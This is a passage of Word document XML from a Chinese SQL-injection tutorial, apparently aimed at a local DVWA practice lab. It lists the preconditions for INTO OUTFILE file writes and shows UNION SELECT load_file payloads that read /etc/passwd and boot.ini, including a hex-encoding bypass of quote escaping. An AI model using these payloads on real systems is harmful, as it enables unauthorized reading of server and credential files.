        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00567CD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以对数据库做安全的时候无论如何不能给网站</w:t>
      </w:r>
      <w:r w:rsidR="00567CD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidR="00567CD3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限，一定要给一个普通用户权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C69E56" w14:textId="77777777" w:rsidR="0091174D" w:rsidRPr="00983549" w:rsidRDefault="0091174D" w:rsidP="00983549">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5364D326" wp14:editId="5E05295A">
            <wp:extent cx="4923653" cy="1367481"/>
            <wp:effectExtent l="1905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918258" cy="1365983"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B510CD" w14:textId="77777777" w:rsidR="00576FC8" w:rsidRDefault="00C74A55" w:rsidP="00576FC8">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="071045A7" wp14:editId="164CD6FC">
            <wp:extent cx="4884150" cy="3742443"/>
            <wp:effectExtent l="19050" t="0" r="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4882272" cy="3741004"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B524DDB" w14:textId="77777777" w:rsidR="003C5A05" w:rsidRDefault="00E12696" w:rsidP="003C5A05">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>五</w:t>
      </w:r>
      <w:r w:rsidR="003C5A05" w:rsidRPr="009937DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="003C5A05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>对服务器文件进行读写操作</w:t>
      </w:r>
      <w:r w:rsidR="0030327B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0030327B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>前提条件</w:t>
      </w:r>
      <w:r w:rsidR="0030327B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F81AC0A" w14:textId="77777777" w:rsidR="0030327B" w:rsidRDefault="00E12696" w:rsidP="00E12696">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用into outfile需要有以下条件：</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要知道远程目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要远程目录有写权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>需要数据库开启secure_file_priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB1E18A" w14:textId="77777777" w:rsidR="0045518E" w:rsidRDefault="0045518E" w:rsidP="00E12696">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F261FCF" w14:textId="77777777" w:rsidR="00E12696" w:rsidRPr="00E12696" w:rsidRDefault="00E12696" w:rsidP="00E12696">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据库开启secure_file_priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149F1647" w14:textId="77777777" w:rsidR="00E12696" w:rsidRDefault="00E12696" w:rsidP="00E12696">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>into outfile 可以将select的结果写入到指定目录的txt中，但需要数据库开启secure_file_priv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>怎么开启secure_file_priv。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36265F9C" w14:textId="77777777" w:rsidR="00E12696" w:rsidRDefault="00E12696" w:rsidP="00E12696">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在mysql安装目录的my.ini文件中的[mysqld]添加secure_file_priv = ' '；然后以管理员身份运行cmd，进入mysql/bin停止mysql服务net stop mysql，重新启动mysql服务net start mysql，登入mysql mysql -u root -p enter password: password，执行命令show variables like '%secure%';查看secure_file_priv的值</w:t>
      </w:r>
      <w:r w:rsidR="00CC003C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00CC003C" w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里已经将secure_file_priv的值设为空，但正常显示为</w:t>
      </w:r>
      <w:r w:rsidR="00CC003C" w:rsidRPr="00CC003C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NULL和文件路径</w:t>
      </w:r>
      <w:r w:rsidR="00CC003C" w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>），显示</w:t>
      </w:r>
      <w:r w:rsidR="00CC003C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>以下</w:t>
      </w:r>
      <w:r w:rsidR="00CC003C" w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>界面</w:t>
      </w:r>
      <w:r w:rsidR="00CC003C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>说明可以对服务器进行读写操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00E12696">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792EB7E3" w14:textId="77777777" w:rsidR="00175B59" w:rsidRPr="00175B59" w:rsidRDefault="00175B59" w:rsidP="00E12696">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CE047AF" wp14:editId="632AB8A6">
            <wp:extent cx="2306320" cy="1095375"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="图片 1" descr="D:\setup\qq\568311803\Image\Group\{2)CF9@6S38}@GIT~9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tup\qq\568311803\Image\Group\{2)CF9@6S38}@GIT~99B)%A.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId126"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2306320" cy="1095375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="105185F7" w14:textId="77777777" w:rsidR="00E12696" w:rsidRDefault="00CC003C" w:rsidP="00E12696">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78FA9B5B" wp14:editId="4126F735">
            <wp:extent cx="4295775" cy="1257300"/>
            <wp:effectExtent l="19050" t="0" r="9525"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4295775" cy="1257300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="228D0A02" w14:textId="77777777" w:rsidR="00E12696" w:rsidRDefault="00E12696" w:rsidP="00E12696">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17C5A7D3" w14:textId="77777777" w:rsidR="0045518E" w:rsidRPr="0045518E" w:rsidRDefault="0045518E" w:rsidP="0045518E">
      <w:pPr>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下面</w:t>
      </w:r>
      <w:r w:rsidR="00A256DA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>联合查询对服务器进行读写操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C40CDE"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使用联合查询语句构造，利用注入读取/ect/passwd 文件（linux系统）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402E5181"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UNION SELECT 1, load_file(/etc/passwd) +–+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF985D3"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使用联合查询语句构造，利用注入读取c:\1.txt (Windows系统)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8FBFD3"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UNION SELECT 1, load_file(‘c:\\1.txt’) +–+        或者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBEE921" w14:textId="77777777" w:rsidR="003C5A05" w:rsidRDefault="008D73E8" w:rsidP="003C5A05">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kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‘ union select 1, load_file(‘c:</w:t>
      </w:r>
      <w:r w:rsidR="003C5A05" w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/1.txt’) +–+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56026AE8" w14:textId="77777777" w:rsidR="00767332" w:rsidRPr="00CD76A0" w:rsidRDefault="00767332" w:rsidP="003C5A05">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注:</w:t>
      </w:r>
      <w:r w:rsidRPr="00767332">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00767332">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“\”(编程里面"\"转义)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CC30E8"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7%20union%20select%201,load_file('c:\\boot.ini')+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757CF9F6" w14:textId="77777777" w:rsidR="003C5A05" w:rsidRDefault="003C5A05" w:rsidP="003C5A05">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EE67D8E" wp14:editId="3B6B6722">
            <wp:extent cx="5274310" cy="2471807"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="1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5274310" cy="2471807"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="568E4FB9"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如果出现以下情况:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9541B4"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Q</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>uery Errot:SELECT CID,TITLE FROM CMS_CONTENTINDEX WHERE TID=25950\’</w:t>
      </w:r>
      <w:r w:rsidR="00530377">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>AND 1=2 UNION SELECT LOAD_FILE(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’C:\\BOOT.INI\’),2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75065387"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显然，在“php.ini"配置文件中magic_quotes_gpc为on</w:t>
      </w:r>
      <w:r w:rsidR="009056A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或在接受参数的时候用了addslashes()涵数</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，单引号</w:t>
      </w:r>
      <w:r w:rsidR="009056A6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就会</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被自动转义成\'，因此函数未能正确执行功能.要绕开此过滤，可将c:\boot.ini转换成十六进制，转换后为:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0x633A5C5C626F6F742E696E69</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.再提交如下链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBF6AA4"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7%20union%20select%201,load_file(0x633A5C5C626F6F742E696E69)+--+&amp;Submit=Submit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606ACE26" w14:textId="77777777" w:rsidR="003C5A05" w:rsidRPr="00CD76A0" w:rsidRDefault="003C5A05" w:rsidP="003C5A05">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或</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.1.55:8080/dvwa/vulnerabilities/sqli/?id=1 and 1=2 union select </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD76A0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
